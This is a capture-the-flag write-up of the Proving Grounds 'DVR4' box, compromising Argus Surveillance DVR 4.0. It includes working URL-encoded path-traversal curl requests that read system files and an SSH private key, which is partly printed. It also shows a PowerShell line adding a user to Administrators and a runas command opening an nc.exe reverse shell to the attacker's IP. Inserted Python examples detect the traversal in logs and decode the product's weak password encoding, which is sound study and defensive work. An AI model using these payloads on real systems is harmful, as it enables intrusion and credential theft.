
Proving Grounds Practice - DVR4

Difficulty

Medium

Scan

OS: Windows 10, Windows Server 2019, Windows Server 2016
OS version: '10.0'
OS release: '2004'
OS build: '19041'

[*] ssh found on tcp/22.
Bitvise WinSSHD 8.48 (FlowSsh 8.48; protocol 2.0; non-commercial use)

[*] msrpc found on tcp/135.

[*] netbios-ssn found on tcp/139.

[*] microsoft-ds found on tcp/445.
SMB 3.0

[*] http-proxy found on tcp/8080.
<meta name="GENERATOR" content="Actual Drawing 6.0 (http://www.pysoft.com) [PYSOFTWARE]">
About the program:

Argus Surveillance DVR
Program is UNREGISTERED
Version: 4.0
Released 18/12/2008
Argus Surveillance Inc.

http-vuln-cve2011-3368:
CVE:CVE-2005-3299 phpmyadmin

[*] unknown found on tcp/5040.

[*] msrpc found on tcp/49664.
[*] msrpc found on tcp/49665.
[*] msrpc found on tcp/49666.
[*] msrpc found on tcp/49667.
[*] msrpc found on tcp/49668.
[*] msrpc found on tcp/49669.

22 WinSSHD

An sshd implementation for Windows; as on Linux, the public/private key files live in the user's .ssh directory.

No exploitable known vulnerabilities were found for version 8.48.

445 SMB

Anonymous login is not possible:

smbclient -L //192.168.140.179 -N
session setup failed: NT_STATUS_ACCESS_DENIED

8080 Argus Surveillance DVR

After getting in, two usernames appear under User: administrator and viewer. There is a change-password option that does not ask for the old password, so I changed the password to 123 and then tried logging in via SSH, which reported an incorrect password. A gobuster directory scan turned up nothing either.

ssh viewer@192.168.140.179 
viewer@192.168.140.179's password:
Permission denied, please try again.
viewer@192.168.140.179's password:

Search for known vulnerabilities with searchsploit and copy all of them over to read the descriptions.

50261 is an unquoted service path; it may be useful for privilege escalation later, but the PoC gives no exploitation method either.

50130 is weak password cracking, and it also hints at the Argus Surveillance DVR configuration path; looking at the code, it decodes the encrypted string in groups of 4 characters.

45296 is path traversal; testing the PoC directly returns results, so it is usable, but what can be read?

curl "http://192.168.140.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON

[drivers]
wave=mmdrv.dll
timer=timer.drv

[mci]

45312 privilege escalation: place a malicious gsm_codec.dll in the Argus application folder; this DLL gets executed as the SYSTEM account.

Foothold

Of the four exploits, the one usable for now is the path traversal. Combined with the other information, the readable targets are the private keys of administrator and viewer, and the configuration in C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini.

  1. Successfully read the viewer account's private key

curl "http://192.168.140.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FUsers%2Fadministrator%2F.ssh%2Fid_rsa"
<HTML><HEAD><TITLE>File Not Found</TITLE></HEAD><BODY><H1>Cannot find this file.</H1>The requested file: <B>/WEBACCOUNT.CGI?OkBtn= Ok &RESULTPAGE=../../../../../../../../../../../../../../../../Users/administrator/.ssh/id_rsa</B> was not found.</BODY></HTML>
curl "http://192.168.140.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FUsers%2Fviewer%2F.ssh%2Fid_rsa"
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAuuXhjQJhDjXBJkiIftPZng7N999zteWzSgthQ5fs9kOhbFzLQJ5J
Ybut0BIbPaUdOhNlQcuhAUZjaaMxnWLbDJgTETK8h162J81p9q6vR2zKpHu9Dhi1ksVyAP
iJ/njNKI0tjtpeO3rjGMkKgNKwvv3y2EcCEt1d+LxsO3Wyb5ezuPT349v+MVs7VW04+mGx
pgheMgbX6HwqGSo9z38QetR6Ryxs+LVX49Bjhskz19gSF4/iTCbqoRo0djcH54fyPOm3OS
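Both reads above (system.ini, then the .ssh private key) go through the same RESULTPAGE parameter of WEBACCOUNT.CGI with a URL-encoded ../ chain, which is what a defender should be watching for in the DVR's web logs. The following is an added example, not code from the original post or from the Argus product: it parses combined-format access log lines (the sample lines are constructed to resemble the requests in this writeup; the source IPs, timestamps and the double-encoded fourth request are made up), percent-decodes every query value until it stops changing so that double encoding is caught, and flags values that still contain ../ after decoding, marking the ones that reach into sensitive files.

```python
"""Flag URL-encoded directory traversal in Argus DVR WEBACCOUNT.CGI requests.

Added example for this writeup, not part of the original post or of the
Argus product. The log lines below are constructed in combined-log format
to look like the traversal requests shown in the writeup.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log lines (not real traffic): two traversal reads like the
# ones in the writeup, one benign request, and one double-encoded traversal.
SAMPLE_LOG = """\
192.168.118.14 - - [21/Feb/2025:09:30:01 +0000] "GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD= HTTP/1.1" 200 512
192.168.118.14 - - [21/Feb/2025:09:31:10 +0000] "GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2FUsers%2Fviewer%2F.ssh%2Fid_rsa HTTP/1.1" 200 2602
10.0.0.5 - - [21/Feb/2025:09:32:00 +0000] "GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=MAINPAGE.HTM&USEREDIRECT=1 HTTP/1.1" 200 1024
10.0.0.7 - - [21/Feb/2025:09:33:00 +0000] "GET /WEBACCOUNT.CGI?RESULTPAGE=%252e%252e%252f%252e%252e%252fWindows%252fwin.ini HTTP/1.1" 200 300
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Paths the writeup shows being read through the traversal, plus win.ini.
SENSITIVE = ("/.ssh/", "/windows/system.ini", "/windows/win.ini", "/dvrparams.ini")


def fully_decode(value, max_rounds=3):
    """Percent-decode until stable so %252e%252e%252f (double encoding) is caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_request(target):
    """Return one finding per query parameter whose decoded value contains '../'."""
    findings = []
    query = urlsplit(target).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for raw in values:
            # parse_qs already decoded once; decode further and normalise slashes
            decoded = fully_decode(raw).replace("\\", "/")
            if "../" not in decoded:
                continue
            low = decoded.lower()
            findings.append({
                "param": name,
                "decoded": decoded,
                "sensitive": any(s in low for s in SENSITIVE),
            })
    return findings


def scan_log(text):
    """Parse combined-format lines and return traversal findings with source and time."""
    results = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for finding in inspect_request(m.group("target")):
            finding.update(src=m.group("src"), time=m.group("time"),
                           status=int(m.group("status")))
            results.append(finding)
    return results


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        flag = "SENSITIVE" if f["sensitive"] else "traversal"
        print(f"{f['time']} {f['src']} {flag}: {f['param']}={f['decoded']}")
```

Pointing scan_log at a real access log is a matter of passing its contents; the status code is kept in each finding because a 200 on a traversal request, as in the curl output above, means the read succeeded and the host should be treated as compromised rather than merely probed.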

Login

ssh viewer@192.168.140.179 -i viewer.id_rsa
Microsoft Windows [Version 10.0.19044.1645]
(c) Microsoft Corporation. All rights reserved.

C:\Users\viewer>whoami
dvr4\viewer
  2. Read the configuration file; nothing related to user passwords

curl "http://192.168.140.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FProgramData%2FPY_Software%2FArgus%20Surveillance%20DVR%2FDVRParams.ini"
[Main]
ServerName=
ServerLocation=
ServerDescription=
ReadH=0
UseDialUp=0
DialUpConName=
DialUpDisconnectWhenDone=0
DIALUPUSEDEFAULTS" checked checked

Escalation

SeShutdownPrivilege

I checked every folder under the viewer account and found nothing. Under C:\ there is an output.txt; its contents show that C:\freezeScript\win10.ps1 was executed as the administrator account, at the time the target booted.

Looking for the script, the C:\freezeScript folder does not even exist. If the viewer account can reboot the machine and has write permission on C:\, arbitrary code could be run with administrator privileges. Checking privileges shows SeShutdownPrivilege, so I wrote a script that adds viewer to the Administrators group.

PS C:\freezeScript> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ==================================== =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
PS C:\> md freezeScript


Directory: C:\


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/21/2025 9:36 AM freezeScript


PS C:\> cd .\freezeScript\
PS C:\freezeScript> 'Add-LocalGroupMember -Group "Administrators" -Member "viewer"'| Out-File -FilePath "C:\freezeScript\win10.ps1"
PS C:\freezeScript> cat win10.ps1
Add-LocalGroupMember -Group "Administrators" -Member "viewer"

Rebooting reports no permission:

PS C:\freezeScript> shutdown /r /t 0
Access is denied.(5)

GPT's answer

Even though you have the SeShutdownPrivilege privilege, this error is usually caused by a lack of administrator rights. Running the shutdown command in PowerShell or the command prompt requires administrator rights; even if you have the relevant privilege, you still need to run PowerShell as administrator.

winpeas

Uploading and running winPEAS gave no useful information either. The viewer account's privileges are fairly low, so a lot of information cannot be collected.

DVR4 configuration

Re-checking the configuration file: dir shows no ProgramData folder, but the configuration file was already read earlier, so the folder must exist; dir -force shows it is hidden.

PS C:\freezeScript> cd /
PS C:\> dir


Directory: C:\


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/21/2025 9:40 AM freezeScript
d----- 2/21/2025 6:08 AM Microsoft
d----- 12/7/2019 1:14 AM PerfLogs
d-r--- 4/15/2022 7:07 AM Program Files
d-r--- 6/18/2021 5:55 AM Program Files (x86)
d-r--- 12/3/2021 12:21 AM Users
d----- 4/15/2022 7:07 AM Windows
-a---- 2/21/2025 4:52 AM 2690 output.txt


PS C:\> dir -force


Directory: C:\


Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 2/21/2025 5:06 AM $Recycle.Bin
d--h-- 4/15/2022 5:02 AM $WinREAgent
d--hs- 4/15/2022 7:08 AM Config.Msi
d--hsl 6/18/2021 10:28 AM Documents and Settings
d----- 2/21/2025 9:40 AM freezeScript
d----- 2/21/2025 6:08 AM Microsoft
d----- 12/7/2019 1:14 AM PerfLogs
d-r--- 4/15/2022 7:07 AM Program Files
d-r--- 6/18/2021 5:55 AM Program Files (x86)
d--h-- 12/3/2021 12:24 AM ProgramData
d--hs- 3/11/2022 10:03 PM Recovery
d--hs- 6/18/2021 3:31 AM System Volume Information
d-r--- 12/3/2021 12:21 AM Users
d----- 4/15/2022 7:07 AM Windows
-a-hs- 8/1/2024 10:33 PM 8192 DumpStack.log.tmp
-a---- 2/21/2025 4:52 AM 2690 output.txt
-a-hs- 8/1/2024 10:33 PM 671088640 pagefile.sys
-a-hs- 8/1/2024 10:33 PM 268435456 swapfile.sys


PS C:\> cd '.\ProgramData\PY_Software\Argus Surveillance DVR\'
PS C:\ProgramData\PY_Software\Argus Surveillance DVR> dir -force


Directory: C:\ProgramData\PY_Software\Argus Surveillance DVR


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/3/2021 12:26 AM Gallery
d----- 12/3/2021 12:24 AM Images
d----- 12/3/2021 12:26 AM Logs
-a---- 2/21/2025 9:28 AM 38 Argus Surveillance DVR.DVRSes
-a---- 2/21/2025 9:45 AM 5782 DVRParams.ini

cat DVRParams.ini shows far more content this time; apparently the number of lines displayed when viewing through curl was limited and the output was truncated. The user section contains the administrator password ciphertext.

Back to 50130.py to crack it:

python 50130.py 
/home/kali/Tools/pg/DVR4/50130.py:27: SyntaxWarning: invalid escape sequence '\_'
banner = '''

#########################################
# _____ Surveillance DVR 4.0 #
# / _ \_______ ____ __ __ ______ #
# / /_\ \_ __ \/ ___\| | \/ ___/ #
# / | \ | \/ /_/ > | /\___ \ #
# \____|__ /__| \___ /|____//____ > #
# \/ /_____/ \/ #
# Weak Password Encryption #
############ @deathflash1411 ############

[+] ECB4:1
[+] 53D1:4
[+] 6069:W
[+] F641:a
[+] E03B:t
[+] D9BD:c
[+] 956B:h
[+] FE36:D
[+] BD8F:0
[+] 3CD9:g
[-] D9A8:Unknown

The last character was not decoded; according to the code comments, the author did not add the encoding information for special characters.
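As an added example of the decoding scheme described above (this is not code from the original post and not the EDB-50130 PoC itself): the stored value is split into 4-hex-digit groups and each group is looked up in a fixed table. The table below holds only the pairs visible in the PoC output; D9A8 is deliberately left out, because the writeup resolved it by trial rather than from the table, and the decoder reports such gaps instead of guessing, which is exactly the "[-] D9A8:Unknown" case. learn_table shows the flip side, the method the official walkthrough used: one known password is enough to recover table entries, which is why a static substitution like this gives stored credentials no real protection. The sample cipher value is constructed by concatenating the groups from the output above; the function names are my own.

```python
"""Decode the Argus Surveillance DVR 4.0 password obfuscation seen in DVRParams.ini.

Added example, not code from the original post or from EDB-50130. It only
uses the 4-hex-digit group -> character pairs visible in the PoC output quoted
in the writeup; everything else (function names, sample value) is constructed.
"""

# Pairs taken from the PoC output quoted in the writeup. D9A8 is deliberately
# absent: the writeup resolved it to '$' only by trying special characters.
KNOWN_GROUPS = {
    "ECB4": "1", "53D1": "4", "6069": "W", "F641": "a", "E03B": "t",
    "D9BD": "c", "956B": "h", "FE36": "D", "BD8F": "0", "3CD9": "g",
}

# Constructed cipher value: the groups from the PoC output concatenated in order.
SAMPLE_CIPHER = "ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8"


def split_groups(cipher):
    """Split the stored value into 4-hex-digit groups; reject bad lengths or non-hex."""
    cipher = cipher.strip().upper()
    if len(cipher) % 4 or any(c not in "0123456789ABCDEF" for c in cipher):
        raise ValueError("expected a multiple of 4 hex digits")
    return [cipher[i:i + 4] for i in range(0, len(cipher), 4)]


def decode(cipher, table=KNOWN_GROUPS, placeholder="?"):
    """Return (plaintext, unknown_groups); groups missing from the table become placeholder."""
    out, unknown = [], []
    for group in split_groups(cipher):
        char = table.get(group)
        if char is None:
            unknown.append(group)
            char = placeholder
        out.append(char)
    return "".join(out), unknown


def learn_table(cipher, known_plaintext):
    """Recover group -> char pairs from one value whose plaintext is known.

    A fixed per-character code means a single known password (for example an
    account you created yourself) reveals the mapping for every character in it.
    """
    groups = split_groups(cipher)
    if len(groups) != len(known_plaintext):
        raise ValueError("plaintext length must match the number of groups")
    return dict(zip(groups, known_plaintext))


if __name__ == "__main__":
    plaintext, gaps = decode(SAMPLE_CIPHER)
    print(plaintext)
    for group in gaps:
        print(f"[-] {group}:Unknown")
```

The decoder stops short of the final character exactly as the PoC does; extending the table from a value you control, via learn_table, is the safe way to fill such a gap, and the fact that this works at all is the finding to report about how the product stores credentials.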

There are not many special characters, so I ran a reverse shell as the administrator user and tried the passwords one by one; entering $ successfully got a shell.

runas /env /profile /user:DVR4\Administrator "C:\temp\nc.exe -e cmd.exe 192.168.118.14 443"
Enter the password for DVR4\Administrator:
nc -nvlp 443
listening on [any] 443 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.140.179] 51874
Microsoft Windows [Version 10.0.19044.1645]
(c) Microsoft Corporation. All rights reserved.

C:\ProgramData\PY_Software\Argus Surveillance DVR>whoami
whoami
dvr4\administrator

In the official walkthrough, a new user was created on the User page with the password set to all of the special characters !@#$%^&*(), and the plaintext was then obtained by comparing against the password in the configuration file.

I had always assumed runas could only be used when a desktop environment is available.

gsm_codec.dll privilege escalation

There is no gcc environment on the target; not tested.

Reflection

This post is my record of attacking the box again from scratch after I still failed even after reading the hints one by one, and then read the full walkthrough. What frustrates and discourages me more is that if I met this box again, even with the overall approach and steps correct, I might still fail to get it. It made me overturn the way I used to solve problems.

  1. Information gathering stage
    1. After seeing the several vulnerabilities in Argus Surveillance, I gave up gathering further information on the web pages, so I failed to find the viewer user.
    2. After looking at the weak-password-cracking PoC I decided it was not usable and did not read the code carefully, overlooking the configuration-file comment in it; I did also try reading that file.
    3. More seriously: even though at this step I saw the configuration file path and tested reading the configuration file, there was no useful information, and after later getting the viewer shell I still would not have thought to check that configuration file again, because my mind works by elimination, constantly ruling out whatever I believe cannot be exploited effectively, subconsciously relieving the guilty feeling that comes from insufficient knowledge and experience.
  2. Privilege escalation stage
    1. After finding that SeShutdownPrivilege could not be used to escalate and winPEAS found nothing useful, I was completely out of ideas; I could at least have searched for more information about DVR4. I relied too much on tools.
    2. More seriously: even if at this step I had found the configuration file, I believe I still would not have immediately thought of the exploit searchsploit had already found, because my mind works by elimination, constantly ruling out whatever I believe cannot be exploited effectively, subconsciously relieving the guilty feeling that comes from insufficient knowledge and experience.

Information gathering matters: do not ignore any piece of information, do not investigate by subtraction, start from the most likely point, rather than my old way of eliminating first and focusing afterwards.